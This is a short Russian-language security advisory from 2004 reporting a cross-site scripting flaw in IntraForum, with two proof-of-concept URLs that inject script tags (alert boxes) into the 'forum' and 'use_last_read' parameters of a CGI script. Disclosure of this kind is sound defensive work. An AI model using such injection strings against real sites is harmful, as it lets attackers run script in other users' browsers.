Межсайтовый скриптинг в IntraForum
| Дата публикации: | 27.01.2004 |
| Всего просмотров: | 1151 |
| Опасность: | Низкая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: IntraForum
Описание: Уязвимость обнаружена в IntraForum. Удаленный пользователь может выполнить XSS нападение. Пример/Эксплоит:
http://[target]/cgi-bin/forumsdb/intraforum_db.cgi?forum= <script>alert('sda')<
/script>&read=&alias=&redir_flag=true
http://[target]/cgi-bin/forumsdb/intraforum_db.cgi?forum=7940&alias=dbr&read=0
00965-000964&session=FFFF& use_last_read="><script>alert('XSS')</script>
URL производителя: http://diburim.co.il/ Решение:qСпособов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | Inrtra Forum Cross Site Scripting Vulnerabillity |